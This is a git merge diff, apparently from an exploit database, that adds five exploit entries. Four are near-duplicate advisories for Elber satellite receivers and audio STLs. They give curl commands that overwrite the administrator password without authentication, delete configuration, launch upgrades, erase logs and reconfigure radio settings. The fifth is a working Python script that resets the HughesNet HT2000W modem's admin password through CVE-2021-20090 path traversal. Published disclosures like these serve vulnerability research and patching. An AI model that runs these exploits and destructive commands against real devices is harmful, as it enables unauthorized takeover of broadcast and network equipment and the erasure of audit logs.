Merge remote-tracking branch 'upstream/main'

exploits/hardware/webapps/52069.txt

@@ -0,0 +1,68 @@
+Elber ESE DVB-S/S2 Satellite Receiver 1.5.x Authentication Bypass
+
+
+Vendor: Elber S.r.l.
+Product web page: https://www.elber.it
+Affected version: 1.5.179 Revision 904
+                  1.5.56 Revision 884
+                  1.229 Revision 440
+
+Summary: ESE (Elber Satellite Equipment) product line, designed for the
+high-end radio contribution and distribution market, where quality and
+reliability are most important. The Elber IRD (Integrated Receiver Decoder)
+ESE-01 offers a professional audio quality (and composite video) at an
+excellent quality/price ratio. The development of digital satellite contribution
+networks and the need to connect a large number of sites require a cheap
+but reliable and performing satellite receiver with integrated decoder.
+
+Desc: The device suffers from an authentication bypass vulnerability through
+a direct and unauthorized access to the password management functionality. The
+issue allows attackers to bypass authentication by manipulating the set_pwd
+endpoint that enables them to overwrite the password of any user within the
+system. This grants unauthorized and administrative access to protected areas
+of the application compromising the device's system security.
+
+--------------------------------------------------------------------------
+/modules/pwd.html
+------------------
+50: function apply_pwd(level, pwd)
+51: {
+52: 	$.get("json_data/set_pwd", {lev:level, pass:pwd},
+53: 	function(data){
+54: 		//$.alert({title:'Operation',text:data});
+55: 		show_message(data);
+56: 	}).fail(function(error){
+57: 		show_message('Error ' + error.status, 'error');
+58: 	});
+59: }
+
+--------------------------------------------------------------------------
+
+Tested on: NBFM Controller
+           embOS/IP
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2024-5820
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5820.php
+
+
+18.08.2023
+
+--
+
+
+$ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234
+
+Ref (lev param):
+
+Level 7 = SNMP Write Community (snmp_write_pwd)
+Level 6 = SNMP Read Community (snmp_read_pwd)
+Level 5 = Custom Password? hidden. (custom_pwd)
+Level 4 = Display Password (display_pwd)?
+Level 2 = Administrator Password (admin_pwd)
+Level 1 = Super User Password (puser_pwd)
+Level 0 = User Password (user_pwd)

exploits/hardware/webapps/52070.txt

@@ -0,0 +1,69 @@
+Elber ESE DVB-S/S2 Satellite Receiver 1.5.x Device Config
+
+
+Vendor: Elber S.r.l.
+Product web page: https://www.elber.it
+Affected version: 1.5.179 Revision 904
+                  1.5.56 Revision 884
+                  1.229 Revision 440
+
+Summary: ESE (Elber Satellite Equipment) product line, designed for the
+high-end radio contribution and distribution market, where quality and
+reliability are most important. The Elber IRD (Integrated Receiver Decoder)
+ESE-01 offers a professional audio quality (and composite video) at an
+excellent quality/price ratio. The development of digital satellite contribution
+networks and the need to connect a large number of sites require a cheap
+but reliable and performing satellite receiver with integrated decoder.
+
+Desc: The device suffers from an unauthenticated device configuration and
+client-side hidden functionality disclosure.
+
+Tested on: NBFM Controller
+           embOS/IP
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2024-5821
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5821.php
+
+
+18.08.2023
+
+--
+
+
+# Config fan
+$ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp='
+Configuration applied
+
+# Delete config
+$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2'
+File delete successfully
+
+# Launch upgrade
+$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1'
+Upgrade launched Successfully
+
+# Log erase
+$ curl 'http://TARGET/json_data/erase_log.js?until=-2'
+Logs erased
+
+# Until:
+# =0 ALL
+# =-2 Yesterday
+# =-8 Last week
+# =-15 Last two weeks
+# =-22 Last three weeks
+# =-31 Last month
+
+# Set RX config
+$ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0'
+RX Config Applied Successfully
+
+# Show factory window and FPGA upload (Console)
+> cleber_show_factory_wnd()
+
+# Etc.

exploits/hardware/webapps/52071.txt

@@ -0,0 +1,70 @@
+Elber Wayber Analog/Digital Audio STL 4.00 Authentication Bypass
+
+
+Vendor: Elber S.r.l.
+Product web page: https://www.elber.it
+Affected version: Version 3.0.0 Revision 1553 (Firmware Ver. 4.00 Rev. 1501)
+                  Version 3.0.0 Revision 1542 (Firmware Ver. 4.00 Rev. 1516)
+                  Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1516)
+                  Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1501)
+                  Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1350)
+                  Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1342)
+                  Version 1.0.0 Revision 1202 (Firmware Ver. 2.00 Rev. 2131)
+
+Summary: Wayber II is the name of an analogue/digital microwave link
+able to transport a Mono or a MPX stereo signal from studio to audio
+transmitter. Compact and reliable, it features very high quality and
+modern technology both in signal processing and microwave section leading
+to outstanding performances.
+
+Desc: The device suffers from an authentication bypass vulnerability through
+a direct and unauthorized access to the password management functionality. The
+issue allows attackers to bypass authentication by manipulating the set_pwd
+endpoint that enables them to overwrite the password of any user within the
+system. This grants unauthorized and administrative access to protected areas
+of the application compromising the device's system security.
+
+--------------------------------------------------------------------------
+/modules/pwd.html
+------------------
+50: function apply_pwd(level, pwd)
+51: {
+52: 	$.get("json_data/set_pwd", {lev:level, pass:pwd},
+53: 	function(data){
+54: 		//$.alert({title:'Operation',text:data});
+55: 		show_message(data);
+56: 	}).fail(function(error){
+57: 		show_message('Error ' + error.status, 'error');
+58: 	});
+59: }
+
+--------------------------------------------------------------------------
+
+Tested on: NBFM Controller
+           embOS/IP
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2024-5822
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5822.php
+
+
+18.08.2023
+
+--
+
+
+$ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234
+
+Ref (lev param):
+
+Level 7 = SNMP Write Community (snmp_write_pwd)
+Level 6 = SNMP Read Community (snmp_read_pwd)
+Level 5 = Custom Password? hidden. (custom_pwd)
+Level 4 = Display Password (display_pwd)?
+Level 2 = Administrator Password (admin_pwd)
+Level 1 = Super User Password (puser_pwd)
+Level 0 = User Password (user_pwd)

exploits/hardware/webapps/52072.txt

@@ -0,0 +1,71 @@
+Elber Wayber Analog/Digital Audio STL 4.00 Device Config
+
+
+Vendor: Elber S.r.l.
+Product web page: https://www.elber.it
+Affected version: Version 3.0.0 Revision 1553 (Firmware Ver. 4.00 Rev. 1501)
+                  Version 3.0.0 Revision 1542 (Firmware Ver. 4.00 Rev. 1516)
+                  Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1516)
+                  Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1501)
+                  Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1350)
+                  Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1342)
+                  Version 1.0.0 Revision 1202 (Firmware Ver. 2.00 Rev. 2131)
+
+Summary: Wayber II is the name of an analogue/digital microwave link
+able to transport a Mono or a MPX stereo signal from studio to audio
+transmitter. Compact and reliable, it features very high quality and
+modern technology both in signal processing and microwave section leading
+to outstanding performances.
+
+Desc: The device suffers from an unauthenticated device configuration and
+client-side hidden functionality disclosure.
+
+Tested on: NBFM Controller
+           embOS/IP
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2024-5823
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5823.php
+
+
+18.08.2023
+
+--
+
+
+# Config fan
+$ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp='
+Configuration applied
+
+# Delete config
+$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2'
+File delete successfully
+
+# Launch upgrade
+$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1'
+Upgrade launched Successfully
+
+# Log erase
+$ curl 'http://TARGET/json_data/erase_log.js?until=-2'
+Logs erased
+
+# Until:
+# =0 ALL
+# =-2 Yesterday
+# =-8 Last week
+# =-15 Last two weeks
+# =-22 Last three weeks
+# =-31 Last month
+
+# Set RX config
+$ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0'
+RX Config Applied Successfully
+
+# Show factory window and FPGA upload (Console)
+> cleber_show_factory_wnd()
+
+# Etc.

exploits/hardware/webapps/52073.py

@@ -0,0 +1,96 @@
+# Exploit Title: HughesNet HT2000W Satellite Modem (Arcadyan httpd 1.0) - Password Reset
+# Date: 7/16/24
+# Exploit Author: Simon Greenblatt <simongreenblatt[at]protonmail.com>
+# Vendor: HughesNet
+# Version: Arcadyan httpd 1.0
+# Tested on: Linux
+# CVE: CVE-2021-20090
+
+import sys
+import requests
+import re
+import base64
+import hashlib
+import urllib
+
+red = "\033[0;41m"
+green = "\033[1;34;42m"
+reset = "\033[0m"
+
+def print_banner():
+    print(green + '''
+    _____________   _______________         _______________   ________  ____          _______________  _______  _______________
+    \_   ___ \   \ /   /\_   _____/         \_____  \   _  \  \_____  \/_   |         \_____  \   _  \ \   _  \/   __   \   _  \
+    /    \  \/\   Y   /  |    __)_   ______  /  ____/  /_\  \  /  ____/ |   |  ______  /  ____/  /_\  \/  /_\  \____    /  /_\  \
+    \     \____\     /   |        \ /_____/ /       \  \_/   \/       \ |   | /_____/ /       \  \_/   \  \_/   \ /    /\  \_/   \
+     \______  / \___/   /_______  /         \_______ \_____  /\_______ \|___|         \_______ \_____  /\_____  //____/  \_____  /
+            \/                  \/                  \/     \/         \/                      \/     \/       \/               \/  \n''' + reset)
+    print("                           Administrator password reset for HughesNet HT2000W Satellite Modem")
+    print('''
+    Usage: python3 hughes_ht2000w_pass_reset.py <password> <ip_address>
+    <password>:   The new administrator password
+    <ip_address>: The IP address of the web portal. If none is provided, the script will default to 192.168.42.1\n
+    This script takes advantage of CVE-2021-20090, a path traversal vulnerability in the HTTP daemon of the HT2000W modem to reset
+    the administrator password of the configuration portal. It also takes advantage of other vulnerabilities in the device such as
+    improper use of httokens for authentication and the portal allowing the MD5 hash of the password to be leaked.''')
+    return None
+
+def get_httoken(ip_address):
+    # Make a GET request to system_p.htm using path traversal
+    r = requests.get(f'http://{ip_address}/images/..%2fsystem_p.htm')
+    if r.status_code != 200:
+        print(red + f"(-) Failure: Could not request system_p.htm" + reset)
+        exit()
+    # Extract the httoken hidden in the DOM and convert it from Base64
+    return base64.b64decode(re.search(r'AAAIBRAA7(.*?)"', r.text).group(1)).decode('ascii')
+
+def encode_pass(password):
+    # Vigenere Cipher
+    key = "wg7005d"
+    enc_pass = ""
+    idx = 0
+    for c in password:
+        enc_pass += str(ord(c) + ord(key[idx])) + "+"
+        idx = (idx + 1) % len(key)
+    return enc_pass
+
+def change_pass(ip_address, httoken, enc_pass):
+    # Create a POST request with the httoken and the encoded password
+    headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': f'http://{ip_address}/system_p.htm'}
+    payload = {'action': 'ui_system_p', 'httoken': httoken, 'submit_button': 'system_p.htm', 'ARC_SYS_Password': enc_pass}
+    payload = urllib.parse.urlencode(payload, safe=':+')
+    try:
+        r = requests.post(f'http://{ip_address}/images/..%2fapply_abstract.cgi', data = payload, headers = headers)
+    except:
+        pass
+    return None
+
+def verify_pass(ip_address, new_pass):
+    # Make a GET request to cgi_sys_p.js to verify password
+    httoken = get_httoken(ip_address)
+    headers = {'Referer': f'http://{ip_address}/system_p.htm'}
+    r = requests.get(f'http://{ip_address}/images/..%2fcgi/cgi_sys_p.js?_tn={httoken}', headers = headers)
+    if r.text.split('"')[5] != hashlib.md5(bytes(new_pass, 'ascii')).hexdigest():
+        print(red + "(-) Failure: Could not verify the hash of the password" + reset)
+        exit()
+
+def main():
+    if not (len(sys.argv) == 2 or len(sys.argv) == 3):
+        print_banner()
+        return
+    new_pass = sys.argv[1]
+    ip_address = "192.168.42.1"
+    if sys.argv == 3:
+        ip_address = sys.argv[2]
+    httoken = get_httoken(ip_address)
+    print(f"[+] Obtained httoken: {httoken}")
+    enc_pass = encode_pass(new_pass)
+    change_pass(ip_address, httoken, enc_pass)
+    print(f"[+] Password reset to: {new_pass}")
+    verify_pass(ip_address, new_pass)
+    print("[+] Verified password hash: " + hashlib.md5(bytes(new_pass, 'ascii')).hexdigest())
+    print("[+] Password successfully changed!")
+    return
+
+if __name__ == '__main__':
+    main()